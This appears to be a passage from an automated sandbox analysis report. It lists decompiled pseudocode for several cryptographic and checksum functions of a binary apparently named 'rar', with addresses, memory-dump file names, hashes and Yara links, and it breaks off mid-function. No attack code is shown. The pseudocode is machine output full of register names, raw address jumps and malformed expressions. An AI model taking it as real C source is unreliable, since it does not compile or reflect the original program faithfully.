                                                                                                            Function 00007FF650B60D58 Relevance: .1, Instructions: 112COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E00007FF67FF650B60D58(void* __rax, long long __rbx, void* __rcx, signed int* __rdx, long long __rsi, long long __rbp, signed int* __r8, long long _a8, long long _a16, long long _a24) {
				void* _t23;
				unsigned int _t30;
				signed int _t41;
				signed int _t42;
				signed int _t47;
				intOrPtr _t55;
				void* _t66;
				signed int _t73;
				void* _t77;
				signed int* _t88;
				signed int* _t90;
				void* _t99;

				_t77 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t90 = __r8;
				 *((intOrPtr*)(__r8 + 0xc)) = 0;
				_t88 = __rdx;
				if ( *((intOrPtr*)(__rdx + 8)) != 0) goto 0x50b60da2;
				_t23 =  *((intOrPtr*)(__rcx + 0xe8)) - 7;
				if ( *((intOrPtr*)(__rdx)) - _t23 <= 0) goto 0x50b60da2;
				0x50b62db8();
				if (_t23 == 0) goto 0x50b60e9c;
				E00007FF67FF650B3630C( ~( *(__rdx + 4)) & 0x00000007, __rdx);
				E00007FF67FF650B36324(__rdx);
				r12d = 8;
				E00007FF67FF650B3630C(r12d, _t88);
				_t42 = bpl & 0xffffffff;
				r15d = _t42;
				r15d = r15d >> 3;
				r15d = r15d & 0x00000003;
				r15d = r15d + 1;
				if (r15d == 4) goto 0x50b60e9c;
				_t90[3] = _t99 + 2;
				_t90[1] = (_t42 & 0x00000007) + 1;
				r13d = E00007FF67FF650B36324(_t88);
				r13d = r13d >> 8;
				E00007FF67FF650B3630C(r12d, _t88);
				_t73 = r15d;
				if (_t73 == 0) goto 0x50b60e4c;
				r12d = 0;
				_t30 = E00007FF67FF650B36324(_t88);
				r12d = r12d + 8;
				_t41 = 0 + (_t30 >> 8 << r12d);
				_t47 = _t88[1] + 8;
				 *_t88 =  *_t88 + (_t47 >> 3);
				_t88[1] = _t47 & 0x00000007;
				if (_t73 != 0) goto 0x50b60e1d;
				 *_t90 = _t41;
				if ((_t41 >> 0x00000010 ^ _t41 >> 0x00000008 ^ _t41 ^ bpl ^ 0x0000005a) != r13b) goto 0x50b60e9c;
				_t90[2] =  *_t88;
				_t55 =  *((intOrPtr*)(__rcx + 0xec));
				_t15 = _t77 - 1; // -1
				_t66 = _t15 + _t41;
				_t56 =  >=  ? _t66 : _t55;
				 *((intOrPtr*)(__rcx + 0xec)) =  >=  ? _t66 : _t55;
				bpl = bpl >> 7;
				_t90[4] = bpl;
				_t90[4] = bpl >> 0x00000006 & 0x00000001;
				goto 0x50b60e9e;
				return 0;
			}















                                                                                                            0x7ff650b60d58
                                                                                                            0x7ff650b60d58
                                                                                                            0x7ff650b60d5d
                                                                                                            0x7ff650b60d62
                                                                                                            0x7ff650b60d76
                                                                                                            0x7ff650b60d79
                                                                                                            0x7ff650b60d7d
                                                                                                            0x7ff650b60d86
                                                                                                            0x7ff650b60d8e
                                                                                                            0x7ff650b60d93
                                                                                                            0x7ff650b60d95
                                                                                                            0x7ff650b60d9c
                                                                                                            0x7ff650b60dad
                                                                                                            0x7ff650b60db5
                                                                                                            0x7ff650b60dbc
                                                                                                            0x7ff650b60dcb
                                                                                                            0x7ff650b60dd0
                                                                                                            0x7ff650b60dd4
                                                                                                            0x7ff650b60dd7
                                                                                                            0x7ff650b60ddb
                                                                                                            0x7ff650b60ddf
                                                                                                            0x7ff650b60de6
                                                                                                            0x7ff650b60df5
                                                                                                            0x7ff650b60df8
                                                                                                            0x7ff650b60e03
                                                                                                            0x7ff650b60e0c
                                                                                                            0x7ff650b60e10
                                                                                                            0x7ff650b60e15
                                                                                                            0x7ff650b60e18
                                                                                                            0x7ff650b60e1a
                                                                                                            0x7ff650b60e20
                                                                                                            0x7ff650b60e2d
                                                                                                            0x7ff650b60e34
                                                                                                            0x7ff650b60e36
                                                                                                            0x7ff650b60e41
                                                                                                            0x7ff650b60e43
                                                                                                            0x7ff650b60e4a
                                                                                                            0x7ff650b60e4e
                                                                                                            0x7ff650b60e65
                                                                                                            0x7ff650b60e69
                                                                                                            0x7ff650b60e6c
                                                                                                            0x7ff650b60e73
                                                                                                            0x7ff650b60e78
                                                                                                            0x7ff650b60e7c
                                                                                                            0x7ff650b60e7f
                                                                                                            0x7ff650b60e8f
                                                                                                            0x7ff650b60e93
                                                                                                            0x7ff650b60e97
                                                                                                            0x7ff650b60e9a
                                                                                                            0x7ff650b60eba

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 62722712922248bf514df927d250a21f8888edf3478f4725c1ba8a727800ae51
                                                                                                            • Instruction ID: e3a0d6641125abf6dc890dd1abd7c80a2ce7580b1f64dad24b75e11e3cb316cd
                                                                                                            • Opcode Fuzzy Hash: 62722712922248bf514df927d250a21f8888edf3478f4725c1ba8a727800ae51
                                                                                                            • Instruction Fuzzy Hash: F331D5B2A185925BD718DA1BD9902BE7BD1F746344F188438DB4BD7B42DE3EE445CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B28B70 Relevance: .1, Instructions: 108COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 73%
                                                                                                            			E00007FF67FF650B28B70(void* __eax, void* __eflags, long long __rbx, void* __rcx, signed int* __rdx, long long __rbp, long long _a24, long long _a32) {
				void* _v40;
				signed int _v56;
				char _v72;
				signed int _t75;
				signed long long _t85;
				unsigned long long _t87;
				unsigned long long _t88;
				unsigned long long _t89;
				unsigned long long _t90;
				unsigned long long _t91;
				unsigned long long _t92;
				void* _t104;
				unsigned long long _t110;

				_a24 = __rbx;
				_a32 = __rbp;
				_t85 =  *0x50b978f0; // 0x27db226282f1
				_v56 = _t85 ^ _t104 - 0x00000040;
				_t75 =  *(__rcx + 0x10a4);
				r15d = 0x1f;
				r11d = _t75;
				asm("movups xmm0, [edx]");
				r11d = r11d ^  *__rdx;
				r12d = r15d;
				asm("movdqu [esp+0x20], xmm0");
				_t87 = _t110;
				asm("rol edx, 0xb");
				r8d =  *(__rcx + 0x10a4 + _t87 * 4);
				_t88 = _t87 >> 0x10;
				r14d =  *(_t88 + __rcx + 0xfa4) & 0x000000ff;
				_t89 = _t88 >> 0x18;
				_t90 = _t89 >> 8;
				r14d = r14d | ( *(_t89 + __rcx + 0xfa4) & 0x000000ff) << 0x00000008;
				r14d = r14d << 8;
				r14d = r14d |  *(_t90 + __rcx + 0xfa4) & 0x000000ff;
				r14d = r14d << 8;
				asm("ror edx, 0xf");
				r14d = r14d |  *(__rcx + __rcx + 0xfa4) & 0x000000ff;
				_t91 = _t90 >> 0x10;
				r14d = r14d ^ r11d;
				r11d = __rdx[2] ^  *(__rcx + 0x10ac);
				r8d =  *(_t91 + __rcx + 0xfa4) & 0x000000ff;
				_t92 = _t91 >> 0x18;
				r8d = r8d | ( *(_t92 + __rcx + 0xfa4) & 0x000000ff) << 0x00000008;
				r8d = r8d << 8;
				r8d = r8d |  *((_t92 >> 8) + __rcx + 0xfa4) & 0x000000ff;
				r8d = r8d << 8;
				r8d = r8d |  *(__rcx + __rcx + 0xfa4) & 0x000000ff;
				r8d = r8d ^ __rdx[1] ^  *(__rcx + 0x10a8);
				r15d = r15d - 1;
				if (__eflags >= 0) goto 0x50b28bd4;
				 *__rdx = _t75 ^ r14d;
				r8d = r8d ^  *(__rcx + 0x10a8);
				__rdx[1] = r8d;
				r11d = r11d ^  *(__rcx + 0x10ac);
				__rdx[2] = r11d;
				__rdx[3] = __rdx[3] ^  *(__rcx + 0x10b0) ^  *(__rcx + 0x10b0);
				return E00007FF67FF650B69D10(E00007FF67FF650B29C58(_t92 >> 8, __rbx, __rcx,  &_v72), (__rdx[2] ^  *(__rcx + 0x10ac) ^ __rdx[3] ^  *(__rcx + 0x10b0)) + r8d & 0x000000ff, _v56 ^ _t104 - 0x00000040);
			}
















                                                                                                            0x7ff650b28b70
                                                                                                            0x7ff650b28b75
                                                                                                            0x7ff650b28b86
                                                                                                            0x7ff650b28b90
                                                                                                            0x7ff650b28b95
                                                                                                            0x7ff650b28b9b
                                                                                                            0x7ff650b28ba4
                                                                                                            0x7ff650b28bad
                                                                                                            0x7ff650b28bb0
                                                                                                            0x7ff650b28bbc
                                                                                                            0x7ff650b28bce
                                                                                                            0x7ff650b28bd4
                                                                                                            0x7ff650b28bdc
                                                                                                            0x7ff650b28be4
                                                                                                            0x7ff650b28bf1
                                                                                                            0x7ff650b28bf8
                                                                                                            0x7ff650b28c03
                                                                                                            0x7ff650b28c12
                                                                                                            0x7ff650b28c1c
                                                                                                            0x7ff650b28c1f
                                                                                                            0x7ff650b28c2c
                                                                                                            0x7ff650b28c32
                                                                                                            0x7ff650b28c38
                                                                                                            0x7ff650b28c49
                                                                                                            0x7ff650b28c4e
                                                                                                            0x7ff650b28c52
                                                                                                            0x7ff650b28c58
                                                                                                            0x7ff650b28c5e
                                                                                                            0x7ff650b28c69
                                                                                                            0x7ff650b28c7b
                                                                                                            0x7ff650b28c82
                                                                                                            0x7ff650b28c92
                                                                                                            0x7ff650b28c98
                                                                                                            0x7ff650b28ca5
                                                                                                            0x7ff650b28ca8
                                                                                                            0x7ff650b28cad
                                                                                                            0x7ff650b28cb4
                                                                                                            0x7ff650b28cc2
                                                                                                            0x7ff650b28cc8
                                                                                                            0x7ff650b28ccf
                                                                                                            0x7ff650b28cd3
                                                                                                            0x7ff650b28cda
                                                                                                            0x7ff650b28ce5
                                                                                                            0x7ff650b28d13

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dd4d8e44034b948ef01939b9d5c205d5daa141f8017decf78adc5d56c0d0d6c1
                                                                                                            • Instruction ID: 1044781926a706e5481c9c3ebaf67f1948dd7bd2007f3a9abbf6b8b9bbdbc6e9
                                                                                                            • Opcode Fuzzy Hash: dd4d8e44034b948ef01939b9d5c205d5daa141f8017decf78adc5d56c0d0d6c1
                                                                                                            • Instruction Fuzzy Hash: 7A4108B33242F54BE3148E1698545B97BD0F78D741F859035EFCA5B701C639D462DB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B28DA8 Relevance: .1, Instructions: 99COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 44%
                                                                                                            			E00007FF67FF650B28DA8(void* __eax, void* __eflags, long long __rbx, void* __rcx, signed int* __rdx, long long __rdi, long long __rsi, long long __rbp, long long _a8, void* _a16, long long _a24, long long _a32) {
				signed int _t78;
				void* _t89;
				unsigned long long _t90;
				unsigned long long _t91;
				unsigned long long _t92;
				unsigned long long _t93;
				unsigned long long _t94;
				unsigned long long _t95;
				long long _t98;
				long long _t105;
				long long _t107;
				void* _t110;
				unsigned int _t115;
				unsigned long long _t124;

				_t89 = _t110;
				 *((long long*)(_t89 + 8)) = __rbx;
				 *((long long*)(_t89 + 0x10)) = __rbp;
				 *((long long*)(_t89 + 0x18)) = __rsi;
				 *((long long*)(_t89 + 0x20)) = __rdi;
				_push(_t124);
				_t78 =  *(__rcx + 0x10a4);
				r11d = _t78;
				r11d = r11d ^  *__rdx;
				r15d = 0;
				_t12 = _t124 + 0x20; // 0x20
				r12d = _t12;
				_t90 = _t124;
				asm("rol edx, 0xb");
				r8d =  *(__rcx + 0x10a4 + _t90 * 4);
				_t91 = _t90 >> 0x10;
				r14d =  *(_t91 + __rcx + 0xfa4) & 0x000000ff;
				_t92 = _t91 >> 0x18;
				_t93 = _t92 >> 8;
				r14d = r14d | ( *(_t92 + __rcx + 0xfa4) & 0x000000ff) << 0x00000008;
				r14d = r14d << 8;
				r14d = r14d |  *(_t93 + __rcx + 0xfa4) & 0x000000ff;
				r14d = r14d << 8;
				asm("ror edx, 0xf");
				r14d = r14d |  *(__rcx + __rcx + 0xfa4) & 0x000000ff;
				_t94 = _t93 >> 0x10;
				r14d = r14d ^ r11d;
				r11d = __rdx[2] ^  *(__rcx + 0x10ac);
				r8d =  *(_t94 + __rcx + 0xfa4) & 0x000000ff;
				_t95 = _t94 >> 0x18;
				r8d = r8d | ( *(_t95 + __rcx + 0xfa4) & 0x000000ff) << 0x00000008;
				r8d = r8d << 8;
				r8d = r8d |  *((_t95 >> 8) + __rcx + 0xfa4) & 0x000000ff;
				r8d = r8d << 8;
				r8d = r8d |  *(__rcx + __rcx + 0xfa4) & 0x000000ff;
				r8d = r8d ^ __rdx[1] ^  *(__rcx + 0x10a8);
				if (__eflags != 0) goto 0x50b28df9;
				 *__rdx = _t78 ^ r14d;
				r8d = r8d ^  *(__rcx + 0x10a8);
				__rdx[1] = r8d;
				r11d = r11d ^  *(__rcx + 0x10ac);
				__rdx[2] = r11d;
				__rdx[3] = __rdx[3] ^  *(__rcx + 0x10b0) ^  *(__rcx + 0x10b0);
				_t98 = _a8;
				_t107 = _a24;
				_t105 = _a32;
				goto E00007FF67FF650B29C58;
				asm("int3");
				if ( *((intOrPtr*)(__rcx + 0xa98)) - 4 - 1 > 0) goto 0x50b28f51;
				return E00007FF67FF650B54EC4(_t98, __rcx + 0xa9c, __rdx, _t105, _t107, _t115, __rdx);
			}

















                                                                                                            0x7ff650b28da8
                                                                                                            0x7ff650b28dab
                                                                                                            0x7ff650b28daf
                                                                                                            0x7ff650b28db3
                                                                                                            0x7ff650b28db7
                                                                                                            0x7ff650b28dbf
                                                                                                            0x7ff650b28dc5
                                                                                                            0x7ff650b28dd1
                                                                                                            0x7ff650b28ddd
                                                                                                            0x7ff650b28df2
                                                                                                            0x7ff650b28df5
                                                                                                            0x7ff650b28df5
                                                                                                            0x7ff650b28df9
                                                                                                            0x7ff650b28e01
                                                                                                            0x7ff650b28e09
                                                                                                            0x7ff650b28e16
                                                                                                            0x7ff650b28e1d
                                                                                                            0x7ff650b28e28
                                                                                                            0x7ff650b28e37
                                                                                                            0x7ff650b28e41
                                                                                                            0x7ff650b28e44
                                                                                                            0x7ff650b28e51
                                                                                                            0x7ff650b28e57
                                                                                                            0x7ff650b28e5d
                                                                                                            0x7ff650b28e6e
                                                                                                            0x7ff650b28e73
                                                                                                            0x7ff650b28e77
                                                                                                            0x7ff650b28e7d
                                                                                                            0x7ff650b28e83
                                                                                                            0x7ff650b28e8e
                                                                                                            0x7ff650b28ea0
                                                                                                            0x7ff650b28ea7
                                                                                                            0x7ff650b28eb7
                                                                                                            0x7ff650b28ebd
                                                                                                            0x7ff650b28eca
                                                                                                            0x7ff650b28ecd
                                                                                                            0x7ff650b28ed9
                                                                                                            0x7ff650b28ee5
                                                                                                            0x7ff650b28eeb
                                                                                                            0x7ff650b28ef2
                                                                                                            0x7ff650b28ef6
                                                                                                            0x7ff650b28efd
                                                                                                            0x7ff650b28f08
                                                                                                            0x7ff650b28f0c
                                                                                                            0x7ff650b28f16
                                                                                                            0x7ff650b28f1b
                                                                                                            0x7ff650b28f2a
                                                                                                            0x7ff650b28f2f
                                                                                                            0x7ff650b28f40
                                                                                                            0x7ff650b28f55

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a846cdc770da1ef57a3dbc09c1d101e5b794b5f6abc555cd720f8868e17c6f6d
                                                                                                            • Instruction ID: 0712ff5962d39431ac41cb4e247d8f1ec0be95233b7ef2b4bb095c124bbc6c5d
                                                                                                            • Opcode Fuzzy Hash: a846cdc770da1ef57a3dbc09c1d101e5b794b5f6abc555cd720f8868e17c6f6d
                                                                                                            • Instruction Fuzzy Hash: A331F1B33202F14BE3148E1A49506A9BBE0E78DB41F899035FFC5ABB45C679E861DB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B28538 Relevance: .1, Instructions: 72COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00007FF67FF650B28538(signed int __ebx, signed int __ecx, signed int __rax, long long __rbx, signed int __rcx, unsigned int __rdx, long long __rdi, long long __rsi, void* __r8, long long _a8, long long _a16, long long _a24) {
				signed int _t61;
				void* _t62;
				unsigned long long _t66;
				signed long long _t67;
				signed int* _t70;
				signed long long _t75;
				unsigned long long _t89;
				void* _t90;

				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				r10d = __ecx;
				if (__r8 == 0) goto 0x50b2857c;
				_t61 = __ebx & 0x00000007;
				if (_t61 == 0) goto 0x50b2857c;
				_t70 = __rdx + 1;
				_t75 = __rcx ^ __rax;
				r10d = r10d >> 8;
				r10d = r10d ^  *(0x50ba1980 + _t75 * 4);
				_t89 = __r8 - 1;
				if (_t61 != 0) goto 0x50b2855c;
				_t62 = _t89 - 8;
				if (_t62 < 0) goto 0x50b28622;
				_t66 = (_t89 >> 3) * 0xfffffff8;
				_t90 = _t89 + _t66;
				r10d = r10d ^  *_t70;
				r9d = _t70[1];
				r8d =  *(0x50ba1980 + (__rdx >> 0x18) * 4);
				r8d = r8d ^  *(0x50ba1980 + 0x400 + _t75 * 4);
				_t67 = _t66 >> 0x18;
				r8d = r8d ^  *(0x50ba1980 + 0x800 + _t75 * 4);
				r8d = r8d ^  *(0x50ba1980 + 0x1000 + _t67 * 4);
				r8d = r8d ^  *(0x50ba1980 + 0x1400 + _t75 * 4);
				r8d = r8d ^  *(0x50ba1980 + 0x1800 + _t75 * 4);
				r8d = r8d ^  *(0x50ba1980 + 0xc00 + _t67 * 4);
				r10d = r8d;
				r10d = r10d ^  *(0x50ba1980 + 0x1c00 + _t67 * 4);
				if (_t62 != 0) goto 0x50b28594;
				if (_t90 == 0) goto 0x50b28642;
				r10d = r10d >> 8;
				r10d = r10d ^  *(0x50ba1980 + (_t75 ^ _t67) * 4);
				if (_t90 - 1 != 0) goto 0x50b28627;
				return r10d;
			}











                                                                                                            0x7ff650b28538
                                                                                                            0x7ff650b2853d
                                                                                                            0x7ff650b28542
                                                                                                            0x7ff650b28554
                                                                                                            0x7ff650b2855a
                                                                                                            0x7ff650b2855c
                                                                                                            0x7ff650b2855f
                                                                                                            0x7ff650b28564
                                                                                                            0x7ff650b2856b
                                                                                                            0x7ff650b2856e
                                                                                                            0x7ff650b28572
                                                                                                            0x7ff650b28576
                                                                                                            0x7ff650b2857a
                                                                                                            0x7ff650b2857c
                                                                                                            0x7ff650b28580
                                                                                                            0x7ff650b2858d
                                                                                                            0x7ff650b28591
                                                                                                            0x7ff650b28594
                                                                                                            0x7ff650b28597
                                                                                                            0x7ff650b285b5
                                                                                                            0x7ff650b285b9
                                                                                                            0x7ff650b285c7
                                                                                                            0x7ff650b285cb
                                                                                                            0x7ff650b285d3
                                                                                                            0x7ff650b285ea
                                                                                                            0x7ff650b285f9
                                                                                                            0x7ff650b28601
                                                                                                            0x7ff650b2860d
                                                                                                            0x7ff650b28610
                                                                                                            0x7ff650b2861c
                                                                                                            0x7ff650b28625
                                                                                                            0x7ff650b28634
                                                                                                            0x7ff650b28638
                                                                                                            0x7ff650b28640
                                                                                                            0x7ff650b28654

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a5d15f99c672d01617ef69a444a4d4c87d695ba7c81ce45407858fc257d98cab
                                                                                                            • Instruction ID: 9da2377b0cc4b77629cdc22892981fd210cc49366aef7f608bfc9c0d76325d56
                                                                                                            • Opcode Fuzzy Hash: a5d15f99c672d01617ef69a444a4d4c87d695ba7c81ce45407858fc257d98cab
                                                                                                            • Instruction Fuzzy Hash: C0212C72F281A187E6658B25A91427A7390F7167C9F885015DFCB93745CD3DFD01CB40
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B28658 Relevance: .1, Instructions: 70COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00007FF67FF650B28658(void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, void* __r8, long long _a8, long long _a16) {
				signed int _t48;
				void* _t49;
				unsigned long long _t96;

				_a8 = __rbx;
				_a16 = __rdi;
				if (__r8 == 0) goto 0x50b28699;
				_t48 = r11b & 0x00000007;
				if (_t48 == 0) goto 0x50b28699;
				_t96 = __r8 - 1;
				if (_t48 != 0) goto 0x50b28677;
				goto 0x50b28736;
				_t49 = __rdx + 9 - __rdx + 1 + (_t96 >> 3) * 8;
				if (_t49 < 0) goto 0x50b286a9;
				r10d = r10d & 0x00000007;
				if (_t49 <= 0) goto 0x50b28761;
				if (_t96 - 1 != 0) goto 0x50b28745;
				return r9b & 0xffffffff;
			}






                                                                                                            0x7ff650b28658
                                                                                                            0x7ff650b2865d
                                                                                                            0x7ff650b28675
                                                                                                            0x7ff650b28677
                                                                                                            0x7ff650b2867b
                                                                                                            0x7ff650b28693
                                                                                                            0x7ff650b28697
                                                                                                            0x7ff650b286a4
                                                                                                            0x7ff650b28736
                                                                                                            0x7ff650b28739
                                                                                                            0x7ff650b2873f
                                                                                                            0x7ff650b28743
                                                                                                            0x7ff650b2875f
                                                                                                            0x7ff650b2876e

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e3fd635936e04cffbcbe757e8988c634f23be79d82a8527df59cd49d7b8ccfca
                                                                                                            • Instruction ID: 80f97ffbed44518f0426ee763ba92af49c62210746d23cb8206ed10abed5bd33
                                                                                                            • Opcode Fuzzy Hash: e3fd635936e04cffbcbe757e8988c634f23be79d82a8527df59cd49d7b8ccfca
                                                                                                            • Instruction Fuzzy Hash: 16210062A257AF62EE569F569564AF923A0F355B81FA42127EF8E17340CF3DE520C300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B5AC20 Relevance: .0, Instructions: 40COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 53%
                                                                                                            			E00007FF67FF650B5AC20(signed int __ebx, void* __edx) {

				asm("cpuid");
				asm("btr eax, 0x1f");
				if (0x80000000 - 7 < 0) goto 0x50b5ac4d;
				asm("cpuid");
				if ((__ebx & 0x00000020) == 0) goto 0x50b5ac52;
